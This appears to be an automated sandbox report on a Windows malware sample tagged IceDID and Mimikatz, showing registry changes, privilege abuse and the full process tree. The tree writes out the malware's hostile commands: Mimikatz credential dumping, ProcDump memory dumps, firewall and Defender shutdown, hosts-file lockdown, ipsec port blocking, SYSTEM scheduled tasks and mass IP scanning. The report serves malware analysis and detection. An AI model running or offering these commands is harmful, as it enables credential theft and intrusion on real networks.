\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fasthhukb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing fasthhukb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fasthhukb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" euubyab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" euubyab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals fasthhukb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fasthhukb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fasthhukb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fasthhukb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fasthhukb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fasthhukb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fasthhukb.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ euubyab.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" euubyab.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" euubyab.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ euubyab.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" euubyab.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ euubyab.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" euubyab.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ euubyab.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" euubyab.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ euubyab.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ euubyab.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" euubyab.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" euubyab.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ euubyab.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4136 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 4632 2024-05-06_8292d241bee855bd08449c5df165663e_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4632 2024-05-06_8292d241bee855bd08449c5df165663e_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 2280 euubyab.exe Token: SeDebugPrivilege 1308 euubyab.exe Token: SeDebugPrivilege 220 vfshost.exe Token: SeDebugPrivilege 2772 fasthhukb.exe Token: SeLockMemoryPrivilege 1704 btglic.exe Token: SeLockMemoryPrivilege 1704 btglic.exe Token: SeDebugPrivilege 1680 fasthhukb.exe Token: SeDebugPrivilege 4540 fasthhukb.exe Token: SeDebugPrivilege 2776 fasthhukb.exe Token: SeDebugPrivilege 2664 fasthhukb.exe Token: SeDebugPrivilege 4940 fasthhukb.exe Token: SeDebugPrivilege 5072 fasthhukb.exe Token: SeDebugPrivilege 2460 fasthhukb.exe Token: SeDebugPrivilege 4996 fasthhukb.exe Token: SeDebugPrivilege 768 fasthhukb.exe Token: SeDebugPrivilege 2456 fasthhukb.exe Token: SeDebugPrivilege 1088 fasthhukb.exe Token: SeDebugPrivilege 2776 fasthhukb.exe Token: SeDebugPrivilege 3244 fasthhukb.exe Token: SeDebugPrivilege 2308 fasthhukb.exe Token: SeDebugPrivilege 4404 fasthhukb.exe Token: SeDebugPrivilege 2460 fasthhukb.exe Token: SeDebugPrivilege 4424 fasthhukb.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4632 2024-05-06_8292d241bee855bd08449c5df165663e_hacktools_icedid_mimikatz.exe 4632 2024-05-06_8292d241bee855bd08449c5df165663e_hacktools_icedid_mimikatz.exe 2280 euubyab.exe 2280 euubyab.exe 1308 euubyab.exe 1308 euubyab.exe 4320 xohudmc.exe 4076 hmdriy.exe 5104 euubyab.exe 5104 euubyab.exe 1800 euubyab.exe 1800 euubyab.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4632 wrote to memory of 3668 4632 2024-05-06_8292d241bee855bd08449c5df165663e_hacktools_icedid_mimikatz.exe 85 PID 4632 wrote to memory of 3668 4632 2024-05-06_8292d241bee855bd08449c5df165663e_hacktools_icedid_mimikatz.exe 85 PID 4632 wrote to memory of 3668 4632 2024-05-06_8292d241bee855bd08449c5df165663e_hacktools_icedid_mimikatz.exe 85 PID 3668 wrote to memory of 4136 3668 cmd.exe 87 PID 3668 wrote to memory of 4136 3668 cmd.exe 87 PID 3668 wrote to memory of 4136 3668 cmd.exe 87 PID 3668 wrote to memory of 2280 3668 cmd.exe 91 PID 3668 wrote to memory of 2280 3668 cmd.exe 91 PID 3668 wrote to memory of 2280 3668 cmd.exe 91 PID 1308 wrote to memory of 1036 1308 euubyab.exe 93 PID 1308 wrote to memory of 1036 1308 euubyab.exe 93 PID 1308 wrote to memory of 1036 1308 euubyab.exe 93 PID 1036 wrote to memory of 5060 1036 cmd.exe 95 PID 1036 wrote to memory of 5060 1036 cmd.exe 95 PID 1036 wrote to memory of 5060 1036 cmd.exe 95 PID 1036 wrote to memory of 2184 1036 cmd.exe 96 PID 1036 wrote to memory of 2184 1036 cmd.exe 96 PID 1036 wrote to memory of 2184 1036 cmd.exe 96 PID 1036 wrote to memory of 4660 1036 cmd.exe 97 PID 1036 wrote to memory of 4660 1036 cmd.exe 97 PID 1036 wrote to memory of 4660 1036 cmd.exe 97 PID 1036 wrote to memory of 3148 1036 cmd.exe 98 PID 1036 wrote to memory of 3148 1036 cmd.exe 98 PID 1036 wrote to memory of 3148 1036 cmd.exe 98 PID 1036 wrote to memory of 644 1036 cmd.exe 99 PID 1036 wrote to memory of 644 1036 cmd.exe 99 PID 1036 wrote to memory of 644 1036 cmd.exe 99 PID 1036 wrote to memory of 780 1036 cmd.exe 100 PID 1036 wrote to memory of 780 1036 cmd.exe 100 PID 1036 wrote to memory of 780 1036 cmd.exe 100 PID 1308 wrote to memory of 3604 1308 euubyab.exe 101 PID 1308 wrote to memory of 3604 1308 euubyab.exe 101 PID 1308 wrote to memory of 3604 1308 euubyab.exe 101 PID 1308 wrote to memory of 4320 1308 euubyab.exe 103 PID 1308 wrote to memory of 4320 1308 euubyab.exe 103 PID 1308 wrote to memory of 4320 1308 euubyab.exe 103 PID 1308 wrote to memory of 4484 1308 euubyab.exe 105 PID 1308 wrote to memory of 4484 1308 euubyab.exe 105 PID 1308 wrote to memory of 4484 1308 euubyab.exe 105 PID 1308 wrote to memory of 2448 1308 euubyab.exe 117 PID 1308 wrote to memory of 2448 1308 euubyab.exe 117 PID 1308 wrote to memory of 2448 1308 euubyab.exe 117 PID 2448 wrote to memory of 3552 2448 cmd.exe 119 PID 2448 wrote to memory of 3552 2448 cmd.exe 119 PID 2448 wrote to memory of 3552 2448 cmd.exe 119 PID 3552 wrote to memory of 1920 3552 wpcap.exe 120 PID 3552 wrote to memory of 1920 3552 wpcap.exe 120 PID 3552 wrote to memory of 1920 3552 wpcap.exe 120 PID 1920 wrote to memory of 4852 1920 net.exe 122 PID 1920 wrote to memory of 4852 1920 net.exe 122 PID 1920 wrote to memory of 4852 1920 net.exe 122 PID 3552 wrote to memory of 1628 3552 wpcap.exe 123 PID 3552 wrote to memory of 1628 3552 wpcap.exe 123 PID 3552 wrote to memory of 1628 3552 wpcap.exe 123 PID 1628 wrote to memory of 3392 1628 net.exe 125 PID 1628 wrote to memory of 3392 1628 net.exe 125 PID 1628 wrote to memory of 3392 1628 net.exe 125 PID 3552 wrote to memory of 3744 3552 wpcap.exe 126 PID 3552 wrote to memory of 3744 3552 wpcap.exe 126 PID 3552 wrote to memory of 3744 3552 wpcap.exe 126 PID 3744 wrote to memory of 1660 3744 net.exe 128 PID 3744 wrote to memory of 1660 3744 net.exe 128 PID 3744 wrote to memory of 1660 3744 net.exe 128 PID 3552 wrote to memory of 1036 3552 wpcap.exe 129
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2088
-
C:\Windows\TEMP\kkutcgiyb\btglic.exe"C:\Windows\TEMP\kkutcgiyb\btglic.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
C:\Users\Admin\AppData\Local\Temp\2024-05-06_8292d241bee855bd08449c5df165663e_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-05-06_8292d241bee855bd08449c5df165663e_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\nziamibb\euubyab.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:4136
-
-
C:\Windows\nziamibb\euubyab.exeC:\Windows\nziamibb\euubyab.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2280
-
-
-
C:\Windows\nziamibb\euubyab.exeC:\Windows\nziamibb\euubyab.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5060
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:2184
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4660
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:3148
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:644
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:780
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵PID:3604
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵PID:4320
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵PID:4484
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\luuiqmitm\ialplgwet\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Windows\luuiqmitm\ialplgwet\wpcap.exeC:\Windows\luuiqmitm\ialplgwet\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3552 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:4852
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:3392
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:3744 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:1660
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:1036
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:1060
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:3444
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4320
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:1816
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:1016
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:2024
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:512
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\luuiqmitm\ialplgwet\tzdhiutbu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\luuiqmitm\ialplgwet\Scant.txt2⤵PID:2836
-
C:\Windows\luuiqmitm\ialplgwet\tzdhiutbu.exeC:\Windows\luuiqmitm\ialplgwet\tzdhiutbu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\luuiqmitm\ialplgwet\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4848
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\luuiqmitm\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\luuiqmitm\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:2216 -
C:\Windows\luuiqmitm\Corporate\vfshost.exeC:\Windows\luuiqmitm\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "yuiymllvi" /ru system /tr "cmd /c C:\Windows\ime\euubyab.exe"2⤵PID:4652
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2476
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "yuiymllvi" /ru system /tr "cmd /c C:\Windows\ime\euubyab.exe"3⤵
- Creates scheduled task(s)
PID:1088
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lzubbiawl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\nziamibb\euubyab.exe /p everyone:F"2⤵PID:4336
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1352
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "lzubbiawl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\nziamibb\euubyab.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:4708
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bhutimtiu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\kkutcgiyb\btglic.exe /p everyone:F"2⤵PID:1068
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:440
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bhutimtiu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\kkutcgiyb\btglic.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:5060
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵PID:836
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵PID:644
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:3644
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:2460
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵PID:3060
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵PID:4320
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:3736
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:1388
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵PID:1704
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵PID:4060
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:4088
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:468
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:4500
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:384
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:2020
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:1096
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
PID:2988
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:1056
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:3376
-
-
-
C:\Windows\TEMP\luuiqmitm\fasthhukb.exeC:\Windows\TEMP\luuiqmitm\fasthhukb.exe -accepteula -mp 792 C:\Windows\TEMP\luuiqmitm\792.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:1536
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:3696
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:2524
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:1548
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:3560
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:3044
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:3784
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:1328
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:3060
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:4380
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:1544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:3888
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:4608
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:2216
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:4612
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:3556
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:2448
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:4320
-
-
C:\Windows\TEMP\luuiqmitm\fasthhukb.exeC:\Windows\TEMP\luuiqmitm\fasthhukb.exe -accepteula -mp 64 C:\Windows\TEMP\luuiqmitm\64.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
-
C:\Windows\TEMP\luuiqmitm\fasthhukb.exeC:\Windows\TEMP\luuiqmitm\fasthhukb.exe -accepteula -mp 2088 C:\Windows\TEMP\luuiqmitm\2088.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4540
-
-
C:\Windows\TEMP\luuiqmitm\fasthhukb.exeC:\Windows\TEMP\luuiqmitm\fasthhukb.exe -accepteula -mp 2736 C:\Windows\TEMP\luuiqmitm\2736.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2776
-
-
C:\Windows\TEMP\luuiqmitm\fasthhukb.exeC:\Windows\TEMP\luuiqmitm\fasthhukb.exe -accepteula -mp 2800 C:\Windows\TEMP\luuiqmitm\2800.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
-
C:\Windows\TEMP\luuiqmitm\fasthhukb.exeC:\Windows\TEMP\luuiqmitm\fasthhukb.exe -accepteula -mp 3012 C:\Windows\TEMP\luuiqmitm\3012.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4940
-
-
C:\Windows\TEMP\luuiqmitm\fasthhukb.exeC:\Windows\TEMP\luuiqmitm\fasthhukb.exe -accepteula -mp 2920 C:\Windows\TEMP\luuiqmitm\2920.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5072
-
-
C:\Windows\TEMP\luuiqmitm\fasthhukb.exeC:\Windows\TEMP\luuiqmitm\fasthhukb.exe -accepteula -mp 3872 C:\Windows\TEMP\luuiqmitm\3872.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
C:\Windows\TEMP\luuiqmitm\fasthhukb.exeC:\Windows\TEMP\luuiqmitm\fasthhukb.exe -accepteula -mp 3964 C:\Windows\TEMP\luuiqmitm\3964.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4996
-
-
C:\Windows\TEMP\luuiqmitm\fasthhukb.exeC:\Windows\TEMP\luuiqmitm\fasthhukb.exe -accepteula -mp 4028 C:\Windows\TEMP\luuiqmitm\4028.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:768
-
-
C:\Windows\TEMP\luuiqmitm\fasthhukb.exeC:\Windows\TEMP\luuiqmitm\fasthhukb.exe -accepteula -mp 1048 C:\Windows\TEMP\luuiqmitm\1048.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2456
-
-
C:\Windows\TEMP\luuiqmitm\fasthhukb.exeC:\Windows\TEMP\luuiqmitm\fasthhukb.exe -accepteula -mp 1412 C:\Windows\TEMP\luuiqmitm\1412.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1088
-
-
C:\Windows\TEMP\luuiqmitm\fasthhukb.exeC:\Windows\TEMP\luuiqmitm\fasthhukb.exe -accepteula -mp 4480 C:\Windows\TEMP\luuiqmitm\4480.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2776
-
-
C:\Windows\TEMP\luuiqmitm\fasthhukb.exeC:\Windows\TEMP\luuiqmitm\fasthhukb.exe -accepteula -mp 3712 C:\Windows\TEMP\luuiqmitm\3712.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3244
-
-
C:\Windows\TEMP\luuiqmitm\fasthhukb.exeC:\Windows\TEMP\luuiqmitm\fasthhukb.exe -accepteula -mp 1156 C:\Windows\TEMP\luuiqmitm\1156.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2308
-
-
C:\Windows\TEMP\luuiqmitm\fasthhukb.exeC:\Windows\TEMP\luuiqmitm\fasthhukb.exe -accepteula -mp 4856 C:\Windows\TEMP\luuiqmitm\4856.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4404
-
-
C:\Windows\TEMP\luuiqmitm\fasthhukb.exeC:\Windows\TEMP\luuiqmitm\fasthhukb.exe -accepteula -mp 1452 C:\Windows\TEMP\luuiqmitm\1452.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
C:\Windows\TEMP\luuiqmitm\fasthhukb.exeC:\Windows\TEMP\luuiqmitm\fasthhukb.exe -accepteula -mp 884 C:\Windows\TEMP\luuiqmitm\884.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4424
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\luuiqmitm\ialplgwet\scan.bat2⤵PID:1760
-
C:\Windows\luuiqmitm\ialplgwet\btczbitmk.exebtczbitmk.exe TCP 191.101.0.1 191.101.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4500
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:6020
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5596
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:5712
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5664
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:5788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5760
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:2788
-
-
-
